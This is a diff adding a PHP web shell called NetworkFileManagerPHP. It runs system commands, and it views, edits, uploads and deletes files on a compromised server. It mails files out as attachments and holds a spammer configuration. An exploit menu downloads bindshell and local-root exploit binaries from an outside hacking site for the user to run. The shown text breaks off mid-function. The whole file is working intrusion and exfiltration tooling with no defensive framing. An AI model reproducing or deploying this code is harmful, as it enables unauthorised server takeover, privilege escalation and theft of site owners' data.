+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
